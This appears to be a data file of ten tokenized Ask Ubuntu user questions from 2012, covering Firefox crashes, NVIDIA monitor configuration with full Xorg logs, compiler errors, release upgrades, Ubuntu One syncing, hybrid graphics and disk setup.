125912	firefox keeps crashing over and over	here is what firefox says when it crashes : add-ons : { e968fc70-8f95-4ab9-9e79-304de2a71ee1 } :0.7.3 , langpack-en-gb @ firefox.mozilla.org:11.0 , langpack-en-za @ firefox.mozilla.org:11.0 , ubufox @ ubuntu.com:0.9.4 , { 972ce4c6-7e08-4474-a285-3208198ce6fd } :11.0 , jid0-qvntohroc01szsinpbesrvcpaoy @ jetpack:1.1.1 , jid0-yxzrusj0woioau89tngazlcis18 @ jetpack:0.7.5 buildid : 20120310193444 crashtime : 1335509696 emcheckcompatibility : true framepoisonbase : 00000000f0dea000 framepoisonsize : 4096 installtime : 1335270972 notes : opengl : dri r300 project -- mesa dri r300 ( rs400 5a62 ) 20090101 x86/mmx/sse2 no-tcl dri2 -- 1.5 mesa 7.9-devel -- texture_from_pixmap productid : { ec8030f7-c20a-464f-9b0e-13a3a9e97384 } productname : firefox releasechannel : release secondssincelastcrash : 325 startuptime : 1335509380 theme : classic/1.0 throttleable : 1 vendor : mozilla version : 11.0 this report also contains technical information about the state of the application when it crashed . it does n't crash every time i start it just most of the time , sometimes it will run fine until it crashes then i start it up and it crashes repeatedly , then it will stay normal and run fine after a few restarts and then start again .
125926	second monitor on nvidia card can not detect proper resolution	a friend had given me one of his extra monitors , and even in windows it gave me trouble in producing the right resolutions . i switched back to ubuntu with the release of pangolin but ca n't get it to work as a second monitor . the monitor is a viewsonic vx2235wm and supposed to operate at 1680x1050 . it is plugged into the second ( vga ) port of my nvidia 9400gt 1gb . i tried playing with xrandr and cvt , and while i can seemingly get modeline information for the desired resolution , i ca n't get it to acknowledge this as a resolution . after trying cvt and xrandr , i kicked around in nvidia-settings , to no avail . i attempted replacing my ( empty ) default xorg.conf with a fresh one put together by nvidia-xconfig , but it too has given me no headway . not sure what other information you would need , here is my xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.40 ( buildmeister @ swio-display-x86-rhel47-06.nvidia.com ) thu apr 5 22:40:54 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection [ ... took out the inputdevice sections to make it all fit ... ] section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 65.0 vertrefresh 43.0 - 72.0 option `` dpms '' modeline `` 1680x1050 '' 119.00 1680 1728 1760 1840 1050 1053 1059 1080 +hsync -vsync endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` modevalidation '' `` nomaxpclkcheck '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection i made two changes to it based on suggestions found here and other places on the internet ; the modeline is mine , the modevalidation option in device is mine , and i upped the horizsync just in case . none of which seemed to have the effect i had hoped for . the xorg.0.log , just in case : [ 764.066 ] x.org x server 1.11.3 release date : 2011-12-16 [ 764.066 ] x protocol version 11 , revision 0 [ 764.066 ] build operating system : linux 2.6.24-29-server x86_64 ubuntu [ 764.066 ] current operating system : linux broodmother 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 [ 764.067 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-24-generic root=uuid=5d056ee3-8b6f-49c1-8934-f3b77b8ffbe4 ro quiet splash vt.handoff=7 [ 764.067 ] build date : 05 april 2012 04:32:37am [ 764.067 ] xorg-server 2:1.11.4-0ubuntu10 ( for technical support please see http : //www.ubuntu.com/support ) [ 764.067 ] current version of pixman : 0.24.4 [ 764.067 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 764.067 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 764.067 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : fri apr 27 00:21:50 2012 [ 764.067 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 764.067 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 764.068 ] ( == ) serverlayout `` layout0 '' [ 764.068 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 764.068 ] ( ** ) | | -- > monitor `` monitor0 '' [ 764.069 ] ( ** ) | | -- > device `` device0 '' [ 764.069 ] ( ** ) | -- > input device `` keyboard0 '' [ 764.069 ] ( ** ) | -- > input device `` mouse0 '' [ 764.069 ] ( == ) automatically adding devices [ 764.069 ] ( == ) automatically enabling devices [ 764.069 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 764.069 ] entry deleted from font path . [ 764.069 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 764.069 ] entry deleted from font path . [ 764.069 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 764.069 ] entry deleted from font path . [ 764.069 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 764.069 ] entry deleted from font path . [ 764.069 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 764.069 ] entry deleted from font path . [ 764.069 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 764.069 ] entry deleted from font path . [ 764.069 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 764.069 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 764.069 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 764.069 ] ( ww ) disabling keyboard0 [ 764.069 ] ( ww ) disabling mouse0 [ 764.069 ] ( ii ) loader magic : 0x7f47c414fb00 [ 764.069 ] ( ii ) module abi versions : [ 764.069 ] x.org ansi c emulation : 0.4 [ 764.069 ] x.org video driver : 11.0 [ 764.069 ] x.org xinput driver : 16.0 [ 764.069 ] x.org server extension : 6.0 [ 764.071 ] ( -- ) pci : * ( 0:2:0:0 ) 10de:0641:196e:0562 rev 161 , mem @ 0xfa000000/16777216 , 0xc0000000/536870912 , 0xf8000000/33554432 , i/o @ 0x0000bc00/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 764.071 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 764.071 ] ( ii ) loadmodule : `` extmod '' [ 764.072 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 764.073 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 764.073 ] compiled for 1.11.3 , module version = 1.0.0 [ 764.073 ] module class : x.org server extension [ 764.073 ] abi class : x.org server extension , version 6.0 [ 764.073 ] ( ii ) loading extension mit-screen-saver [ 764.073 ] ( ii ) loading extension xfree86-vidmodeextension [ 764.073 ] ( ii ) loading extension xfree86-dga [ 764.073 ] ( ii ) loading extension dpms [ 764.073 ] ( ii ) loading extension xvideo [ 764.073 ] ( ii ) loading extension xvideo-motioncompensation [ 764.073 ] ( ii ) loading extension x-resource [ 764.073 ] ( ii ) loadmodule : `` dbe '' [ 764.074 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 764.074 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 764.074 ] compiled for 1.11.3 , module version = 1.0.0 [ 764.074 ] module class : x.org server extension [ 764.074 ] abi class : x.org server extension , version 6.0 [ 764.074 ] ( ii ) loading extension double-buffer [ 764.074 ] ( ii ) loadmodule : `` glx '' [ 764.074 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 764.090 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 764.090 ] compiled for 4.0.2 , module version = 1.0.0 [ 764.090 ] module class : x.org server extension [ 764.090 ] ( ii ) nvidia glx module 295.40 thu apr 5 21:57:38 pdt 2012 [ 764.090 ] ( ii ) loading extension glx [ 764.090 ] ( ii ) loadmodule : `` record '' [ 764.091 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 764.091 ] ( ii ) module record : vendor= '' x.org foundation '' [ 764.091 ] compiled for 1.11.3 , module version = 1.13.0 [ 764.091 ] module class : x.org server extension [ 764.091 ] abi class : x.org server extension , version 6.0 [ 764.091 ] ( ii ) loading extension record [ 764.091 ] ( ii ) loadmodule : `` dri '' [ 764.091 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 764.091 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 764.091 ] compiled for 1.11.3 , module version = 1.0.0 [ 764.091 ] abi class : x.org server extension , version 6.0 [ 764.091 ] ( ii ) loading extension xfree86-dri [ 764.091 ] ( ii ) loadmodule : `` dri2 '' [ 764.091 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 764.091 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 764.091 ] compiled for 1.11.3 , module version = 1.2.0 [ 764.091 ] abi class : x.org server extension , version 6.0 [ 764.091 ] ( ii ) loading extension dri2 [ 764.091 ] ( ii ) loadmodule : `` nvidia '' [ 764.091 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 764.092 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 764.092 ] compiled for 4.0.2 , module version = 1.0.0 [ 764.092 ] module class : x.org video driver [ 764.092 ] ( ii ) nvidia dlloader x driver 295.40 thu apr 5 21:38:35 pdt 2012 [ 764.092 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 764.092 ] ( ++ ) using vt number 7 [ 764.092 ] ( ii ) loading sub module `` fb '' [ 764.092 ] ( ii ) loadmodule : `` fb '' [ 764.092 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 764.093 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 764.093 ] compiled for 1.11.3 , module version = 1.0.0 [ 764.093 ] abi class : x.org ansi c emulation , version 0.4 [ 764.093 ] ( ii ) loading sub module `` wfb '' [ 764.093 ] ( ii ) loadmodule : `` wfb '' [ 764.093 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 764.093 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 764.093 ] compiled for 1.11.3 , module version = 1.0.0 [ 764.093 ] abi class : x.org ansi c emulation , version 0.4 [ 764.093 ] ( ii ) loading sub module `` ramdac '' [ 764.093 ] ( ii ) loadmodule : `` ramdac '' [ 764.093 ] ( ii ) module `` ramdac '' already built-in [ 764.093 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 764.093 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 764.093 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 764.093 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 764.093 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 764.093 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 764.093 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 764.093 ] ( ** ) nvidia ( 0 ) : option `` modevalidation '' `` nomaxpclkcheck '' [ 764.093 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 765.391 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-1 [ 765.471 ] ( ii ) nvidia ( gpu-0 ) : display ( ancor communications inc asus vh222h ( dfp-0 ) ) does [ 765.471 ] ( ii ) nvidia ( gpu-0 ) : not support nvidia 3d vision stereo . [ 765.473 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce 9400 gt ( g96 ) at pci:2:0:0 ( gpu-0 ) [ 765.473 ] ( -- ) nvidia ( 0 ) : memory : 1048576 kbytes [ 765.473 ] ( -- ) nvidia ( 0 ) : videobios : 62.94.61.00.51 [ 765.473 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 765.473 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 765.475 ] ( -- ) nvidia ( 0 ) : connected display device ( s ) on geforce 9400 gt at pci:2:0:0 [ 765.475 ] ( -- ) nvidia ( 0 ) : crt-1 [ 765.475 ] ( -- ) nvidia ( 0 ) : ancor communications inc asus vh222h ( dfp-0 ) [ 765.475 ] ( -- ) nvidia ( 0 ) : crt-1 : 400.0 mhz maximum pixel clock [ 765.475 ] ( -- ) nvidia ( 0 ) : ancor communications inc asus vh222h ( dfp-0 ) : 330.0 mhz [ 765.475 ] ( -- ) nvidia ( 0 ) : maximum pixel clock [ 765.475 ] ( -- ) nvidia ( 0 ) : ancor communications inc asus vh222h ( dfp-0 ) : internal dual [ 765.475 ] ( -- ) nvidia ( 0 ) : link tmds [ 765.525 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 765.526 ] ( ** ) nvidia ( 0 ) : device ancor communications inc asus vh222h ( dfp-0 ) ( using [ 765.526 ] ( ** ) nvidia ( 0 ) : edid frequencies has been enabled on all display [ 765.526 ] ( ** ) nvidia ( 0 ) : devices . ) [ 765.526 ] ( ii ) nvidia ( 0 ) : mode validation overrides for ancor communications inc asus [ 765.526 ] ( ii ) nvidia ( 0 ) : vh222h ( dfp-0 ) : [ 765.526 ] ( ii ) nvidia ( 0 ) : nomaxpclkcheck [ 765.590 ] ( ii ) nvidia ( 0 ) : assigned display device : dfp-0 [ 765.590 ] ( == ) nvidia ( 0 ) : [ 765.590 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 765.590 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 765.590 ] ( == ) nvidia ( 0 ) : [ 765.590 ] ( ii ) nvidia ( 0 ) : validated modes : [ 765.590 ] ( ii ) nvidia ( 0 ) : `` nvidia-auto-select '' [ 765.590 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1920 x 1080 [ 765.620 ] ( -- ) nvidia ( 0 ) : dpi set to ( 103 , 105 ) ; computed from `` useediddpi '' x config [ 765.620 ] ( -- ) nvidia ( 0 ) : option [ 765.620 ] ( -- ) depth 24 pixmap format is 32 bpp [ 765.620 ] ( ii ) nvidia : using 768.00 mb of virtual memory for indirect memory access . [ 765.624 ] ( ii ) nvidia ( 0 ) : setting mode `` nvidia-auto-select '' [ 765.662 ] ( ii ) loading extension nv-glx [ 765.697 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 765.697 ] ( == ) nvidia ( 0 ) : backing store disabled [ 765.697 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 765.698 ] ( ** ) nvidia ( 0 ) : dpms enabled [ 765.698 ] ( ii ) loading extension nv-control [ 765.698 ] ( ii ) loading extension xinerama [ 765.698 ] ( ii ) loading sub module `` dri2 '' [ 765.698 ] ( ii ) loadmodule : `` dri2 '' [ 765.698 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 765.698 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 765.698 ] compiled for 1.11.3 , module version = 1.2.0 [ 765.698 ] abi class : x.org server extension , version 6.0 [ 765.698 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 765.698 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 765.698 ] ( == ) randr enabled [ 765.698 ] ( ii ) initializing built-in extension generic event extension [ 765.698 ] ( ii ) initializing built-in extension shape [ 765.698 ] ( ii ) initializing built-in extension mit-shm [ 765.698 ] ( ii ) initializing built-in extension xinputextension [ 765.698 ] ( ii ) initializing built-in extension xtest [ 765.698 ] ( ii ) initializing built-in extension big-requests [ 765.698 ] ( ii ) initializing built-in extension sync [ 765.698 ] ( ii ) initializing built-in extension xkeyboard [ 765.698 ] ( ii ) initializing built-in extension xc-misc [ 765.698 ] ( ii ) initializing built-in extension security [ 765.698 ] ( ii ) initializing built-in extension xinerama [ 765.698 ] ( ii ) initializing built-in extension xfixes [ 765.698 ] ( ii ) initializing built-in extension render [ 765.698 ] ( ii ) initializing built-in extension randr [ 765.698 ] ( ii ) initializing built-in extension composite [ 765.698 ] ( ii ) initializing built-in extension damage [ 765.700 ] ( ii ) initializing extension glx [ 765.715 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 765.718 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 765.718 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 765.718 ] ( ii ) loadmodule : `` evdev '' [ 765.718 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 765.718 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 765.718 ] compiled for 1.11.3 , module version = 2.7.0 [ 765.718 ] module class : x.org xinput driver [ 765.718 ] abi class : x.org xinput driver , version 16.0 [ 765.718 ] ( ii ) using input driver 'evdev ' for 'power button' [ 765.718 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 765.718 ] ( ** ) power button : always reports core events [ 765.718 ] ( ** ) evdev : power button : device : `` /dev/input/event1 '' [ 765.719 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 765.719 ] ( -- ) evdev : power button : found keys [ 765.719 ] ( ii ) evdev : power button : configuring as keyboard [ 765.719 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 765.719 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 765.719 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 765.719 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 765.719 ] ( ** ) option `` xkb_layout '' `` us '' [ 765.719 ] ( ** ) option `` xkb_variant '' `` intl '' [ 765.720 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-a5431d4a34463c892c9e905e2e421b30a3cc30dd.xkm [ 765.721 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 765.721 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 765.721 ] ( ii ) using input driver 'evdev ' for 'power button' [ 765.721 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 765.721 ] ( ** ) power button : always reports core events [ 765.721 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 765.721 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 765.721 ] ( -- ) evdev : power button : found keys [ 765.721 ] ( ii ) evdev : power button : configuring as keyboard [ 765.721 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 765.721 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 7 ) [ 765.721 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 765.721 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 765.721 ] ( ** ) option `` xkb_layout '' `` us '' [ 765.721 ] ( ** ) option `` xkb_variant '' `` intl '' [ ... took out info about the logitech usb reciever to make it all fit ... ] [ 765.724 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 765.724 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 765.724 ] ( ** ) option `` xkb_layout '' `` us '' [ 765.724 ] ( ** ) option `` xkb_variant '' `` intl '' [ 765.724 ] ( ii ) evdev : logitech usb receiver : initialized for relative axes . [ 765.724 ] ( ww ) evdev : logitech usb receiver : ignoring absolute axes . [ 765.724 ] ( ** ) logitech usb receiver : ( accel ) keeping acceleration scheme 1 [ 765.724 ] ( ** ) logitech usb receiver : ( accel ) acceleration profile 0 [ 765.724 ] ( ** ) logitech usb receiver : ( accel ) acceleration factor : 2.000 [ 765.724 ] ( ** ) logitech usb receiver : ( accel ) acceleration threshold : 4 [ 765.725 ] ( ii ) config/udev : adding input device logitech usb keyboard ( /dev/input/event4 ) [ 765.725 ] ( ** ) logitech usb keyboard : applying inputclass `` evdev keyboard catchall '' [ 765.725 ] ( ii ) using input driver 'evdev ' for 'logitech usb keyboard' [ 765.725 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 765.725 ] ( ** ) logitech usb keyboard : always reports core events [ 765.725 ] ( ** ) evdev : logitech usb keyboard : device : `` /dev/input/event4 '' [ 765.725 ] ( -- ) evdev : logitech usb keyboard : vendor 0x46d product 0xc31c [ 765.725 ] ( -- ) evdev : logitech usb keyboard : found keys [ 765.725 ] ( ii ) evdev : logitech usb keyboard : configuring as keyboard [ 765.725 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:04.0/usb4/4-4/4-4:1.0/input/input4/event4 '' [ 765.725 ] ( ii ) xinput : adding extended input device `` logitech usb keyboard '' ( type : keyboard , id 11 ) [ 765.725 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 765.725 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 765.725 ] ( ** ) option `` xkb_layout '' `` us '' [ 765.725 ] ( ** ) option `` xkb_variant '' `` intl '' [ 765.725 ] ( ii ) config/udev : adding input device logitech usb keyboard ( /dev/input/event5 ) [ 765.725 ] ( ** ) logitech usb keyboard : applying inputclass `` evdev keyboard catchall '' [ 765.725 ] ( ii ) using input driver 'evdev ' for 'logitech usb keyboard' [ 765.725 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 765.725 ] ( ** ) logitech usb keyboard : always reports core events [ 765.725 ] ( ** ) evdev : logitech usb keyboard : device : `` /dev/input/event5 '' [ 765.725 ] ( -- ) evdev : logitech usb keyboard : vendor 0x46d product 0xc31c [ 765.725 ] ( -- ) evdev : logitech usb keyboard : found absolute axes [ 765.725 ] ( ii ) evdev : logitech usb keyboard : forcing absolute x/y axes to exist . [ 765.725 ] ( -- ) evdev : logitech usb keyboard : found keys [ 765.725 ] ( ii ) evdev : logitech usb keyboard : configuring as mouse [ 765.725 ] ( ii ) evdev : logitech usb keyboard : configuring as keyboard [ 765.725 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:04.0/usb4/4-4/4-4:1.1/input/input5/event5 '' [ 765.725 ] ( ii ) xinput : adding extended input device `` logitech usb keyboard '' ( type : keyboard , id 12 ) [ 765.725 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 765.725 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 765.725 ] ( ** ) option `` xkb_layout '' `` us '' [ 765.725 ] ( ** ) option `` xkb_variant '' `` intl '' [ 765.726 ] ( ii ) evdev : logitech usb keyboard : initialized for absolute axes . [ 765.726 ] ( ** ) logitech usb keyboard : ( accel ) keeping acceleration scheme 1 [ 765.726 ] ( ** ) logitech usb keyboard : ( accel ) acceleration profile 0 [ 765.726 ] ( ** ) logitech usb keyboard : ( accel ) acceleration factor : 2.000 [ 765.726 ] ( ** ) logitech usb keyboard : ( accel ) acceleration threshold : 4 [ 765.726 ] ( ii ) config/udev : adding input device microsoft lifechat lx-3000 ( /dev/input/event6 ) [ 765.726 ] ( ** ) microsoft lifechat lx-3000 : applying inputclass `` evdev keyboard catchall '' [ 765.726 ] ( ii ) using input driver 'evdev ' for 'microsoft lifechat lx-3000 ' [ 765.726 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 765.726 ] ( ** ) microsoft lifechat lx-3000 : always reports core events [ 765.726 ] ( ** ) evdev : microsoft lifechat lx-3000 : device : `` /dev/input/event6 '' [ 765.726 ] ( -- ) evdev : microsoft lifechat lx-3000 : vendor 0x45e product 0x70f [ 765.726 ] ( -- ) evdev : microsoft lifechat lx-3000 : found keys [ 765.726 ] ( ii ) evdev : microsoft lifechat lx-3000 : configuring as keyboard [ 765.726 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:04.0/usb4/4-5/4-5:1.3/input/input6/event6 '' [ 765.726 ] ( ii ) xinput : adding extended input device `` microsoft lifechat lx-3000 `` ( type : keyboard , id 13 ) [ 765.726 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 765.726 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 765.726 ] ( ** ) option `` xkb_layout '' `` us '' [ 765.726 ] ( ** ) option `` xkb_variant '' `` intl '' [ 765.727 ] ( ii ) config/udev : adding input device hda nvidia rear mic ( /dev/input/event10 ) [ 765.727 ] ( ii ) no input driver specified , ignoring this device . [ 765.727 ] ( ii ) this device may have been added with another device file . [ 765.727 ] ( ii ) config/udev : adding input device hda nvidia front headphone ( /dev/input/event11 ) [ 765.727 ] ( ii ) no input driver specified , ignoring this device . [ 765.727 ] ( ii ) this device may have been added with another device file . [ 765.727 ] ( ii ) config/udev : adding input device hda nvidia line-out clfe ( /dev/input/event12 ) [ 765.727 ] ( ii ) no input driver specified , ignoring this device . [ 765.727 ] ( ii ) this device may have been added with another device file . [ 765.727 ] ( ii ) config/udev : adding input device hda nvidia line-out surround ( /dev/input/event13 ) [ 765.727 ] ( ii ) no input driver specified , ignoring this device . [ 765.727 ] ( ii ) this device may have been added with another device file . [ 765.728 ] ( ii ) config/udev : adding input device hda nvidia line-out front ( /dev/input/event14 ) [ 765.728 ] ( ii ) no input driver specified , ignoring this device . [ 765.728 ] ( ii ) this device may have been added with another device file . [ 765.728 ] ( ii ) config/udev : adding input device hda nvidia line ( /dev/input/event8 ) [ 765.728 ] ( ii ) no input driver specified , ignoring this device . [ 765.728 ] ( ii ) this device may have been added with another device file . [ 765.728 ] ( ii ) config/udev : adding input device hda nvidia front mic ( /dev/input/event9 ) [ 765.728 ] ( ii ) no input driver specified , ignoring this device . [ 765.728 ] ( ii ) this device may have been added with another device file . [ 766.279 ] ( ii ) nvidia ( 0 ) : setting mode `` 1920x1080_60_0 '' [ 779.677 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-27b6b510261bf6e4adb20ed0604835ae1ea5a001.xkm [ 798.384 ] ( ii ) nvidia ( 0 ) : setting mode [ 798.384 ] ( ii ) nvidia ( 0 ) : `` dfp-0:1920x1080_60_0 @ 1920x1080+0+0 , crt-1:1360x768 @ 1360x768+1920+0 ''
125927	compiling c++ code raising `` no input files '' fatal error ?	i am finding it hard to run/compile a simple c++ code in the terminal . here 's the code i am using to compile the file ( helloworld.cpp ) . g++ helloworld.cpp -o helloworld i am getting an error . ( image )
125934	is there any application like proxyfire ?	in windows7 i using proxyfire to pass through the internet filtering . now i am using ubuntu and i looked everywhere and read many posts but still cant find any easy app . can anyone help me ? by the way , i tried using proxychain but unfortunately that was really un-user friendly
125938	upgrade hangs on ttf-mscorefonts-installer	i am trying to upgrade from 11.10 to 12.04 and the upgrade seems to be stuck downloading ttf-mscorefonts . is there a way to bypass this ? output from /var/log/dist-upgrade installing new version of config file /etc/xdg/autostart/print-applet.desktop ... setting up ubuntu-wallpapers-precise ( 0.34.1 ) ... setting up ubuntu-wallpapers ( 0.34.1 ) ... setting up adium-theme-ubuntu ( 0.3.2-0ubuntu1 ) ... setting up update-manager-core ( 1:0.156.14 ) ... installing new version of config file /etc/update-manager/release-upgrades ... setting up update-notifier-common ( 0.119ubuntu8.1 ) ... ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/andale32.exe -- 0 : precise -- time-stamp -- apr/27/12 8:15:21 -- -- 0 : precise -- time-stamp -- apr/27/12 8:20:10 -- -- 0 : precise -- time-stamp -- apr/27/12 8:22:01 -- -- 0 : precise -- time-stamp -- apr/27/12 8:55:14 -- phiri @ phrlig001 : /var/log/dist-upgrade $ lsb_release -a lsb version : core-2.0-ia32 : core-2.0-noarch : core-3.0-ia32 : core-3.0-noarch : core-3.1-ia32 : core-3.1-noarch : core-3.2-ia32 : core-3.2-noarch : core-4.0-ia32 : core-4.0-noarch distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise phiri @ phrlig001 : /var/log/dist-upgrade $
125942	u1partial - and modification stamp on files	very often the syncing process are finished with two files , example money.ods and money.ods.u1partial . the last one is tagged as the newest and i have to rename files to move on working . why ? i have earlier asked why files after syncing get new date and time stamps , that gives a file syncing from another computer newer mod . date than the one you have in your working directory even if the last one is the newest . i work with files in a working directory , then copy them to the ubuntu one directory for syncing . changing the date and time in this way means that you do n't know which is the newest . ( this is question # 2 , maybe i should edit it as a separate question ? )
125947	can i update from `` ubuntu-12.04-desktop-i386.iso '' file ?	update speed is so slow , and i have download the new iso file : ubuntu-12.04-desktop-i386.iso , can i update directly from the iso file ? my version is 11.10 , any help is appreciated .
125953	hybrid graphics functional wo n't work with my asus ul30v anymore	the problem is that i am no longer able to boot in compatibility mode for just turning on my nvidia graphics to install the driver . because no login screen will appear if ubuntu is loading . in ubuntu 11.10 i was able to activate nvidia graphics only ' option this way : 1 ) change bios to 'compatibility mode ' which will turn off the intel card . 2 ) install the nvidia proprietary driver using ubuntu 's driver finder ( additional drivers ) and then reboot . i was not interested using only the intel graphics , for the sake of battery life . now i have both cards running and they drain my battery life dramatically . and the main problem of this configuration no opengl is available , so i ca n't play any games any more . at this point , i have a pre-solution . i uninstalled the nvidia drivers and installed bumblebee . now the intel card is recognized . i would prefer to run just the nvidia card as in ubuntu 11.10 but for now this is better than nothing . does anybody else have the same problem ?
125964	how to access second disk locally and over lan	i have just added a second 1tb hd to my ubuntu box and i can see it listed when i run blkid . but how do i reference it so i can use it as local storage share it on my lan
125965	when to use 64 bit version ?	i have a duo core processor with 4 gb ram . should i use the 64 bit version for ubuntu 12.04 ?
